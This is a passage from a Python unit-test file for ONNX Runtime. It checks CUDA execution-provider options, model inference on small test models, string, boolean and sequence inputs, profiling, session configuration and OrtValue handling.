            test_get_and_set_option_with_values(
                'arena_extend_strategy', ['kNextPowerOfTwo', 'kSameAsRequested'])

            test_get_and_set_option_with_values(
                'cudnn_conv_algo_search', ["DEFAULT", "EXHAUSTIVE", "HEURISTIC"])

            test_get_and_set_option_with_values(
                'do_copy_in_default_stream', [0, 1])

            option['gpu_external_alloc'] = '0'
            option['gpu_external_free'] = '0'
            sess.set_providers(['CUDAExecutionProvider'], [option])
            options = sess.get_provider_options()
            self.assertEqual(options['CUDAExecutionProvider']['gpu_external_alloc'], '0')
            self.assertEqual(options['CUDAExecutionProvider']['gpu_external_free'], '0')
            #
            # Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
            # so run them last. Each set_providers call will attempt to re-create a session, so it's
            # fine for a test that fails to run immediately after another one that fails.
            # Alternatively a valid call to set_providers could be used to recreate the underlying session
            # after a failed call.
            #
            option['arena_extend_strategy'] = 'wrong_value'
            with self.assertRaises(RuntimeError):
                sess.set_providers(['CUDAExecutionProvider'], [option])

            option['gpu_mem_limit'] = -1024
            with self.assertRaises(RuntimeError):
                sess.set_providers(['CUDAExecutionProvider'], [option])

            option['gpu_mem_limit'] = 1024.1024
            with self.assertRaises(RuntimeError):
                sess.set_providers(['CUDAExecutionProvider'], [option])

            option['gpu_mem_limit'] = 'wrong_value'
            with self.assertRaises(RuntimeError):
                sess.set_providers(['CUDAExecutionProvider'], [option])

        def getCudaDeviceCount():
            # Query the CUDA driver directly via ctypes; -1 signals failure.
            import ctypes
            num_device = ctypes.c_int()
            result = ctypes.c_int()
            error_str = ctypes.c_char_p()
            result = cuda.cuInit(0)
            result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
            if result != CUDA_SUCCESS:
                cuda.cuGetErrorString(result, ctypes.byref(error_str))
                print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
                return -1
            return num_device.value

        def setDeviceIdTest(i):
            # Setting device_id must bind the CUDA context to that device.
            import ctypes
            import onnxruntime as onnxrt
            device = ctypes.c_int()
            result = ctypes.c_int()
            error_str = ctypes.c_char_p()
            sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
            option = {'device_id': i}
            sess.set_providers(['CUDAExecutionProvider'], [option])
            self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
            result = cuda.cuCtxGetDevice(ctypes.byref(device))
            if result != CUDA_SUCCESS:
                cuda.cuGetErrorString(result, ctypes.byref(error_str))
                print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
            self.assertEqual(result, CUDA_SUCCESS)
            self.assertEqual(i, device.value)

        def runAdvancedTest():
            num_device = getCudaDeviceCount()
            if num_device < 0:
                return
            # Configure session to be ready to run on all available cuda devices
            for i in range(num_device):
                setDeviceIdTest(i)
            sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
            # configure session with invalid option values and that should fail
            with self.assertRaises(RuntimeError):
                option = {'device_id': num_device}
                sess.set_providers(['CUDAExecutionProvider'], [option])
                # NOTE(review): the two statements below never execute — the
                # preceding call raises and exits the with-block first.
                option = {'device_id': 'invalid_value'}
                sess.set_providers(['CUDAExecutionProvider'], [option])
            # configure session with invalid option should fail
            with self.assertRaises(RuntimeError):
                option = {'invalid_option': 123}
                sess.set_providers(['CUDAExecutionProvider'], [option])

        libnames = ('libcuda.so', 'libcuda.dylib', 'cuda.dll')
        for libname in libnames:
            try:
                cuda = ctypes.CDLL(libname)
                runBaseTest1()
                runBaseTest2()
                runAdvancedTest()
            except OSError:
                continue
            else:
                break
        else:
            # CUDA driver library not loadable: run only the driver-free tests.
            runBaseTest1()
            runBaseTest2()
            # raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
    """Registering an unknown EP name raises a descriptive RuntimeError."""
    with self.assertRaises(RuntimeError) as context:
        sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
        sess.set_providers(['InvalidProvider'])
    self.assertTrue('Unknown Provider Type: InvalidProvider' in str(context.exception))
def testSessionProviders(self):
    """The providers= constructor argument constrains the session's EP list."""
    if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
        # create session from scratch, but constrain it to only use the CPU.
        sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
        self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testRunModel(self):
    """mul_1.onnx squares its input elementwise; check I/O metadata and output."""
    sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
    x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
    inp = sess.get_inputs()[0]
    self.assertEqual(inp.name, "X")
    self.assertEqual(inp.shape, [3, 2])
    out = sess.get_outputs()[0]
    self.assertEqual(out.name, "Y")
    self.assertEqual(out.shape, [3, 2])
    res = sess.run([out.name], {inp.name: x})
    expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
    np.testing.assert_allclose(expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
    """A session created from in-memory model bytes behaves like one from a path."""
    with open(get_name("mul_1.onnx"), "rb") as f:
        content = f.read()
    sess = onnxrt.InferenceSession(content)
    x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
    input_name = sess.get_inputs()[0].name
    self.assertEqual(input_name, "X")
    input_shape = sess.get_inputs()[0].shape
    self.assertEqual(input_shape, [3, 2])
    output_name = sess.get_outputs()[0].name
    self.assertEqual(output_name, "Y")
    output_shape = sess.get_outputs()[0].shape
    self.assertEqual(output_shape, [3, 2])
    res = sess.run([output_name], {input_name: x})
    output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
    np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
    """matmul_1.onnx maps a [3,2] input to a [3,1] product; verify metadata and result."""
    sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
    x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
    input_name = sess.get_inputs()[0].name
    self.assertEqual(input_name, "X")
    input_shape = sess.get_inputs()[0].shape
    self.assertEqual(input_shape, [3, 2])
    output_name = sess.get_outputs()[0].name
    self.assertEqual(output_name, "Y")
    output_shape = sess.get_outputs()[0].shape
    self.assertEqual(output_shape, [3, 1])
    res = sess.run([output_name], {input_name: x})
    output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
    np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
    """A non-contiguous input view yields the same result as its contiguous copy."""
    sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
    # Fancy indexing produces a non-contiguous array with the original values.
    x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
    input_name = sess.get_inputs()[0].name
    self.assertEqual(input_name, "X")
    input_shape = sess.get_inputs()[0].shape
    self.assertEqual(input_shape, [3, 2])
    output_name = sess.get_outputs()[0].name
    self.assertEqual(output_name, "Y")
    output_shape = sess.get_outputs()[0].shape
    self.assertEqual(output_shape, [3, 1])
    res = sess.run([output_name], {input_name: x})
    output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
    np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
    xcontiguous = np.ascontiguousarray(x)
    rescontiguous = sess.run([output_name], {input_name: xcontiguous})
    np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
    """One session object supports concurrent Run() calls from two threads."""
    available_providers = onnxrt.get_available_providers()

    # Skip this test for a "pure" DML onnxruntime python wheel. We keep this test enabled for instances where both DML and CUDA
    # EPs are available (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precendence than DML
    # and the nodes are assigned to only the CUDA EP (which supports this test)
    if ('DmlExecutionProvider' in available_providers and not 'CUDAExecutionProvider' in available_providers):
        print("Skipping testRunModelMultipleThreads as the DML EP does not support calling Run() on different threads using the same session object ")
    else:
        so = onnxrt.SessionOptions()
        so.log_verbosity_level = 1
        so.logid = "MultiThreadsTest"
        sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
        ro1 = onnxrt.RunOptions()
        ro1.logid = "thread1"
        t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
        ro2 = onnxrt.RunOptions()
        ro2.logid = "thread2"
        t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
        t1.start()
        t2.start()
        t1.join()
        t2.join()
def testListAsInput(self):
    """Nested Python lists are accepted wherever a tensor input is expected."""
    sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
    x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
    feed = {sess.get_inputs()[0].name: x.tolist()}
    res = sess.run([], feed)
    expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
    np.testing.assert_allclose(expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
    """Nested lists of strings feed a tensor(string) input and round-trip intact."""
    sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
    x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
    x_name = sess.get_inputs()[0].name
    res = sess.run([], {x_name: x.tolist()})
    np.testing.assert_equal(x, res[0])
def testRunDevice(self):
    """get_device() must report a CPU or GPU device."""
    reported = onnxrt.get_device()
    self.assertTrue(any(tag in reported for tag in ('CPU', 'GPU')))
def testRunModelSymbolicInput(self):
    """Symbolic (unknown) dimensions are reported as 'None' in the I/O shapes."""
    sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"))
    x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
    input_name = sess.get_inputs()[0].name
    self.assertEqual(input_name, "X")
    input_shape = sess.get_inputs()[0].shape
    # Input X has an unknown dimension.
    self.assertEqual(input_shape, ['None', 2])
    output_name = sess.get_outputs()[0].name
    self.assertEqual(output_name, "Y")
    output_shape = sess.get_outputs()[0].shape
    # Output X has an unknown dimension.
    self.assertEqual(output_shape, ['None', 1])
    res = sess.run([output_name], {input_name: x})
    output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
    np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
    """Boolean tensors run through the logical-and model; check metadata and result."""
    sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
    a = np.array([[True, True], [False, False]], dtype=bool)
    b = np.array([[True, False], [True, False]], dtype=bool)

    # input1:0 is first in the protobuf, and input:0 is second
    # and we maintain the original order.
    a_name = sess.get_inputs()[0].name
    self.assertEqual(a_name, "input1:0")
    a_shape = sess.get_inputs()[0].shape
    self.assertEqual(a_shape, [2, 2])
    a_type = sess.get_inputs()[0].type
    self.assertEqual(a_type, 'tensor(bool)')

    b_name = sess.get_inputs()[1].name
    self.assertEqual(b_name, "input:0")
    b_shape = sess.get_inputs()[1].shape
    self.assertEqual(b_shape, [2, 2])
    # BUG FIX: previously re-checked the type of input 0; check the second input.
    b_type = sess.get_inputs()[1].type
    self.assertEqual(b_type, 'tensor(bool)')

    output_name = sess.get_outputs()[0].name
    self.assertEqual(output_name, "output:0")
    output_shape = sess.get_outputs()[0].shape
    self.assertEqual(output_shape, [2, 2])
    output_type = sess.get_outputs()[0].type
    self.assertEqual(output_type, 'tensor(bool)')

    output_expected = np.array([[True, False], [False, False]], dtype=bool)
    res = sess.run([output_name], {a_name: a, b_name: b})
    np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
    """ASCII string tensors round-trip unchanged through the identity model."""
    sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
    x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
    x_name = sess.get_inputs()[0].name
    self.assertEqual(x_name, "input:0")
    x_shape = sess.get_inputs()[0].shape
    self.assertEqual(x_shape, [2, 2])
    x_type = sess.get_inputs()[0].type
    self.assertEqual(x_type, 'tensor(string)')
    output_name = sess.get_outputs()[0].name
    self.assertEqual(output_name, "output:0")
    output_shape = sess.get_outputs()[0].shape
    self.assertEqual(output_shape, [2, 2])
    output_type = sess.get_outputs()[0].type
    self.assertEqual(output_type, 'tensor(string)')
    res = sess.run([output_name], {x_name: x})
    np.testing.assert_equal(x, res[0])
def testStringInput2(self):
    """Non-ASCII (multi-byte) string tensors round-trip unchanged."""
    sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
    x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=str).reshape((2, 2))
    x_name = sess.get_inputs()[0].name
    self.assertEqual(x_name, "input:0")
    x_shape = sess.get_inputs()[0].shape
    self.assertEqual(x_shape, [2, 2])
    x_type = sess.get_inputs()[0].type
    self.assertEqual(x_type, 'tensor(string)')
    output_name = sess.get_outputs()[0].name
    self.assertEqual(output_name, "output:0")
    output_shape = sess.get_outputs()[0].shape
    self.assertEqual(output_shape, [2, 2])
    output_type = sess.get_outputs()[0].type
    self.assertEqual(output_type, 'tensor(string)')
    res = sess.run([output_name], {x_name: x})
    np.testing.assert_equal(x, res[0])
def testInputBytes(self):
    """bytes arrays are accepted for tensor(string) inputs; output decodes back."""
    sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
    x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
    x_name = sess.get_inputs()[0].name
    self.assertEqual(x_name, "input:0")
    x_shape = sess.get_inputs()[0].shape
    self.assertEqual(x_shape, [2, 2])
    x_type = sess.get_inputs()[0].type
    self.assertEqual(x_type, 'tensor(string)')
    output_name = sess.get_outputs()[0].name
    self.assertEqual(output_name, "output:0")
    output_shape = sess.get_outputs()[0].shape
    self.assertEqual(output_shape, [2, 2])
    output_type = sess.get_outputs()[0].type
    self.assertEqual(output_type, 'tensor(string)')
    res = sess.run([output_name], {x_name: x})
    # Compare in bytes space: the output comes back as str.
    np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
    """object-dtype string arrays are accepted for tensor(string) inputs."""
    sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
    x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
    x_name = sess.get_inputs()[0].name
    self.assertEqual(x_name, "input:0")
    x_shape = sess.get_inputs()[0].shape
    self.assertEqual(x_shape, [2, 2])
    x_type = sess.get_inputs()[0].type
    self.assertEqual(x_type, 'tensor(string)')
    output_name = sess.get_outputs()[0].name
    self.assertEqual(output_name, "output:0")
    output_shape = sess.get_outputs()[0].shape
    self.assertEqual(output_shape, [2, 2])
    output_type = sess.get_outputs()[0].type
    self.assertEqual(output_type, 'tensor(string)')
    res = sess.run([output_name], {x_name: x})
    np.testing.assert_equal(x, res[0])
def testInputVoid(self):
    """np.void-dtype arrays feed tensor(string) inputs; output decodes to str."""
    sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
    # numpy 1.20+ doesn't automatically pad the bytes based entries in the array when dtype is np.void,
    # so we use inputs where that is the case
    x = np.array([b'must', b'have', b'same', b'size'], dtype=np.void).reshape((2, 2))
    x_name = sess.get_inputs()[0].name
    self.assertEqual(x_name, "input:0")
    x_shape = sess.get_inputs()[0].shape
    self.assertEqual(x_shape, [2, 2])
    x_type = sess.get_inputs()[0].type
    self.assertEqual(x_type, 'tensor(string)')
    output_name = sess.get_outputs()[0].name
    self.assertEqual(output_name, "output:0")
    output_shape = sess.get_outputs()[0].shape
    self.assertEqual(output_shape, [2, 2])
    output_type = sess.get_outputs()[0].type
    self.assertEqual(output_type, 'tensor(string)')
    res = sess.run([output_name], {x_name: x})
    expr = np.array([['must', 'have'], ['same', 'size']], dtype=object)
    np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
    """Feeding fewer inputs than the model requires raises a clear ValueError."""
    with self.assertRaises(ValueError) as context:
        sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
        a = np.array([[True, True], [False, False]], dtype=bool)
        res = sess.run([], {'input:0': a})
    self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
    """Model metadata fields are exposed; silently skipped when the model is absent."""
    model_path = "../models/opset8/test_squeezenet/model.onnx"
    if not os.path.exists(model_path):
        return
    sess = onnxrt.InferenceSession(model_path)
    modelmeta = sess.get_modelmeta()
    self.assertEqual('onnx-caffe2', modelmeta.producer_name)
    self.assertEqual('squeezenet_old', modelmeta.graph_name)
    self.assertEqual('', modelmeta.domain)
    self.assertEqual('', modelmeta.description)
    self.assertEqual('', modelmeta.graph_description)
def testProfilerWithSessionOptions(self):
    """Profiling writes a JSON trace whose entries carry the expected tags."""
    so = onnxrt.SessionOptions()
    so.enable_profiling = True
    sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
    x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
    sess.run([], {'X': x})
    profile_file = sess.end_profiling()

    tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
    with open(profile_file) as f:
        lines = f.readlines()
        lines_len = len(lines)
        self.assertTrue(lines_len > 8)
        # The trace is a JSON array: '[' first, ']' last, tagged events between.
        self.assertTrue('[' in lines[0])
        for i in range(1, lines_len-1):
            for tag in tags:
                self.assertTrue(tag in lines[i])
        self.assertTrue(']' in lines[-1])
def testProfilerGetStartTimeNs(self):
    """Profiling start times of successive sessions are monotonically non-decreasing."""
    def getSingleSessionProfilingStartTime():
        so = onnxrt.SessionOptions()
        so.enable_profiling = True
        sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
        return sess.get_profiling_start_time_ns()

    # Get 1st profiling's start time
    start_time_1 = getSingleSessionProfilingStartTime()
    # Get 2nd profiling's start time
    start_time_2 = getSingleSessionProfilingStartTime()
    # Get 3rd profiling's start time
    start_time_3 = getSingleSessionProfilingStartTime()

    # Chronological profiling's start time
    self.assertTrue(start_time_1 <= start_time_2 <= start_time_3)
def testGraphOptimizationLevel(self):
    """graph_optimization_level defaults to ORT_ENABLE_ALL and is settable."""
    opt = onnxrt.SessionOptions()
    # default should be all optimizations optimization
    self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
    opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
    self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED)
    sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt)
    a = np.array([[True, True], [False, False]], dtype=bool)
    b = np.array([[True, False], [True, False]], dtype=bool)

    res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
    """A seq(tensor(float)) input of two tensors yields SequenceLength == 2."""
    sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"))
    x = [
        np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
        np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))
    ]

    x_name = sess.get_inputs()[0].name
    self.assertEqual(x_name, "X")
    x_type = sess.get_inputs()[0].type
    self.assertEqual(x_type, 'seq(tensor(float))')

    output_name = sess.get_outputs()[0].name
    self.assertEqual(output_name, "Y")
    output_type = sess.get_outputs()[0].type
    self.assertEqual(output_type, 'tensor(int64)')

    output_expected = np.array(2, dtype=np.int64)
    res = sess.run([output_name], {x_name: x})
    self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
    """Two int64 tensor inputs are assembled into a seq(tensor(int64)) output."""
    session = onnxrt.InferenceSession(get_name("sequence_construct.onnx"))
    first_input = session.get_inputs()[0]
    second_input = session.get_inputs()[1]
    self.assertEqual('tensor(int64)', first_input.type)
    self.assertEqual('tensor(int64)', second_input.type)
    self.assertEqual("tensor1", first_input.name)
    self.assertEqual("tensor2", second_input.name)
    output_meta = session.get_outputs()[0]
    self.assertEqual("output_sequence", output_meta.name)
    self.assertEqual('seq(tensor(int64))', output_meta.type)
    tensor1 = np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))
    tensor2 = np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
    result = session.run([output_meta.name], {"tensor1": tensor1, "tensor2": tensor2})
    # Output sequence preserves the order of the two input tensors.
    np.testing.assert_array_equal([tensor1, tensor2], result[0])
def testSequenceInsert(self):
    """Inserting a tensor into an empty sequence yields a one-element sequence."""
    options = onnxrt.SessionOptions()
    options.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
    session = onnxrt.InferenceSession(get_name("sequence_insert.onnx"), sess_options=options)
    seq_input = session.get_inputs()[0]
    tensor_input = session.get_inputs()[1]
    self.assertEqual('seq(tensor(int64))', seq_input.type)
    self.assertEqual('tensor(int64)', tensor_input.type)
    self.assertEqual("input_seq", seq_input.name)
    self.assertEqual("tensor", tensor_input.name)
    output_meta = session.get_outputs()[0]
    self.assertEqual("output_sequence", output_meta.name)
    self.assertEqual('seq(tensor(int64))', output_meta.type)
    inserted = np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))
    result = session.run([output_meta.name], {"tensor": inserted, "input_seq": []})
    np.testing.assert_array_equal([inserted], result[0])
def testOrtExecutionMode(self):
    """Execution mode defaults to sequential and can be switched to parallel."""
    options = onnxrt.SessionOptions()
    self.assertEqual(onnxrt.ExecutionMode.ORT_SEQUENTIAL, options.execution_mode)
    options.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
    self.assertEqual(onnxrt.ExecutionMode.ORT_PARALLEL, options.execution_mode)
def testLoadingSessionOptionsFromModel(self):
    """Options embedded in the model's ORT config JSON are applied when
    ORT_LOAD_CONFIG_FROM_MODEL is set.

    Fix: the original `except Exception: raise` clause was a no-op re-raise;
    a plain try/finally provides the identical behavior without dead code.
    """
    try:
        os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1)
        sess = onnxrt.InferenceSession(get_name("model_with_valid_ort_config_json.onnx"))
        session_options = sess.get_session_options()
        self.assertEqual(session_options.inter_op_num_threads, 5)  # from the ORT config
        self.assertEqual(session_options.intra_op_num_threads, 2)  # from the ORT config
        self.assertEqual(session_options.execution_mode,
                         onnxrt.ExecutionMode.ORT_SEQUENTIAL)  # default option (not from the ORT config)
        self.assertEqual(session_options.graph_optimization_level,
                         onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)  # from the ORT config
        self.assertEqual(session_options.enable_profiling, True)  # from the ORT config
    finally:
        # Make sure the usage of the feature is disabled after this test
        os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
    """Free dims overridden by denotation show up in the resolved input shape."""
    options = onnxrt.SessionOptions()
    for denotation, value in (("DATA_BATCH", 3), ("DATA_CHANNEL", 5)):
        options.add_free_dimension_override_by_denotation(denotation, value)
    session = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), options)
    model_input = session.get_inputs()[0]
    self.assertEqual("x", model_input.name)
    # Dims denoted "DATA_BATCH" and "DATA_CHANNEL" now carry the overridden values.
    self.assertEqual([3, 5, 5], model_input.shape)
def testSessionOptionsAddFreeDimensionOverrideByName(self):
    """Free dims overridden by symbolic name show up in the resolved input shape."""
    options = onnxrt.SessionOptions()
    for dim_name, value in (("Dim1", 4), ("Dim2", 6)):
        options.add_free_dimension_override_by_name(dim_name, value)
    session = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), options)
    model_input = session.get_inputs()[0]
    self.assertEqual("x", model_input.name)
    # "Dim1" and "Dim2" now carry the overridden values.
    self.assertEqual([4, 6, 5], model_input.shape)
def testSessionOptionsAddConfigEntry(self):
    """A config entry written via add_session_config_entry can be read back."""
    options = onnxrt.SessionOptions()
    options.add_session_config_entry("CONFIG_KEY", "CONFIG_VAL")
    self.assertEqual("CONFIG_VAL", options.get_session_config_entry("CONFIG_KEY"))
def testInvalidSessionOptionsConfigEntry(self):
    """Reading an unknown config key raises RuntimeError naming the key."""
    options = onnxrt.SessionOptions()
    invalid_key = "INVALID_KEY"
    with self.assertRaises(RuntimeError) as context:
        options.get_session_config_entry(invalid_key)
    expected_fragment = 'SessionOptions does not have configuration with key: ' + invalid_key
    self.assertTrue(expected_fragment in str(context.exception))
def testSessionOptionsAddInitializer(self):
    """An initializer supplied via SessionOptions overrides the model's own."""
    # This initializer is different from the actual initializer in the model for "W".
    override = onnxrt.OrtValue.ortvalue_from_numpy(
        np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32))
    options = onnxrt.SessionOptions()
    # The caller must keep the OrtValue alive as long as any dependent session.
    options.add_initializer("W", override)
    # Restrict to the CPU EP: the override lives on CPU and must be the one used,
    # proving the model initializer was replaced.
    session = onnxrt.InferenceSession(get_name("mul_1.onnx"), options, ['CPUExecutionProvider'])
    result = session.run(["Y"], {"X": np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)})
    self.assertTrue(np.array_equal(
        result[0], np.array([[2.0, 2.0], [12.0, 12.0], [30.0, 30.0]], dtype=np.float32)))
def testRegisterCustomOpsLibrary(self):
    """A custom-op shared library registers and can be shared across sessions."""
    # Pick the platform-specific library name; a single existence check follows.
    if sys.platform.startswith("win"):
        shared_library = 'custom_op_library.dll'
    elif sys.platform.startswith("darwin"):
        shared_library = 'libcustom_op_library.dylib'
    else:
        shared_library = './libcustom_op_library.so'
    if not os.path.exists(shared_library):
        raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
    this = os.path.dirname(__file__)
    custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
    if not os.path.exists(custom_op_model):
        raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
    so1 = onnxrt.SessionOptions()
    so1.register_custom_ops_library(shared_library)
    # Model loading successfully indicates the custom op node could be resolved.
    sess1 = onnxrt.InferenceSession(custom_op_model, so1)
    # Run with input data.
    input_name_0 = sess1.get_inputs()[0].name
    input_name_1 = sess1.get_inputs()[1].name
    output_name = sess1.get_outputs()[0].name
    res = sess1.run(
        [output_name],
        {input_name_0: np.ones((3, 5)).astype(np.float32),
         input_name_1: np.zeros((3, 5)).astype(np.float32)})
    np.testing.assert_allclose(
        np.ones((3, 5)).astype(np.float32), res[0], rtol=1e-05, atol=1e-08)
    # An alias of the same SessionOptions instance still resolves the custom op.
    so2 = so1
    sess2 = onnxrt.InferenceSession(custom_op_model, so2)
    # A fresh SessionOptions referencing the same shared library also works.
    so3 = onnxrt.SessionOptions()
    so3.register_custom_ops_library(shared_library)
    sess3 = onnxrt.InferenceSession(custom_op_model, so3)
def testOrtValue(self):
    """OrtValue created from numpy is fully usable on CPU and, when available,
    CUDA, and remains valid before and after being consumed by a session run.

    Fix: the CPU and CUDA paths previously duplicated the same seven checks
    verbatim; they are factored into one helper parameterized by device name.
    """
    numpy_arr_input = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
    numpy_arr_output = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)

    def test_session_with_ortvalue_input(ortvalue):
        # Feed the OrtValue directly as a session input and check the product.
        sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
        res = sess.run(["Y"], {"X": ortvalue})
        self.assertTrue(np.array_equal(res[0], numpy_arr_output))

    def validate_ortvalue(ortvalue, device_name):
        # Shared checks for an OrtValue wrapping numpy_arr_input.
        self.assertEqual(ortvalue.device_name(), device_name)
        self.assertEqual(ortvalue.shape(), [3, 2])
        self.assertEqual(ortvalue.data_type(), "tensor(float)")
        self.assertEqual(ortvalue.is_tensor(), True)
        self.assertTrue(np.array_equal(ortvalue.numpy(), numpy_arr_input))
        # Pass in the constructed OrtValue to a session via Run() and check results
        test_session_with_ortvalue_input(ortvalue)
        # The constructed OrtValue should still be valid after being used in a session
        self.assertTrue(np.array_equal(ortvalue.numpy(), numpy_arr_input))

    validate_ortvalue(onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input), "cpu")
    if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
        validate_ortvalue(
            onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input, 'cuda', 0), "cuda")
def testRunModelWithCudaCopyStream(self):
    """Regression test for issue #4829: race condition when the CUDA copy is
    not on the default stream.

    Fixes: `(not X in Y)` replaced with the idiomatic `X not in Y`, and the
    else-block flattened into an early-return guard clause.
    """
    available_providers = onnxrt.get_available_providers()
    if 'CUDAExecutionProvider' not in available_providers:
        print("Skipping testRunModelWithCudaCopyStream when CUDA is not available")
        return
    # adapted from issue #4829 for a race condition when copy is not on default stream
    # note:
    # 1. if there are intermittent failure in this test, something is wrong
    # 2. it's easier to repro on slower GPU (like M60, Geforce 1070)
    # to repro #4829, set the CUDA EP do_copy_in_default_stream option to False
    providers = [("CUDAExecutionProvider", {"do_copy_in_default_stream": True}), "CPUExecutionProvider"]
    session = onnxrt.InferenceSession(get_name("issue4829.onnx"), providers=providers)
    shape = np.array([2, 2], dtype=np.int64)
    # Many iterations are needed to make the (absence of the) race observable.
    for iteration in range(100000):
        result = session.run(output_names=['output'], input_feed={'shape': shape})
def testSharedAllocatorUsingCreateAndRegisterAllocator(self):
    """Sessions opt in to a process-wide registered arena allocator via the
    "session.use_env_allocators" config entry.

    Fix: removed a stray C-style trailing semicolon.
    """
    # Create and register an arena based allocator
    # ort_arena_cfg = onnxrt.OrtArenaCfg(0, -1, -1, -1) (create an OrtArenaCfg like this template if you want to use non-default parameters)
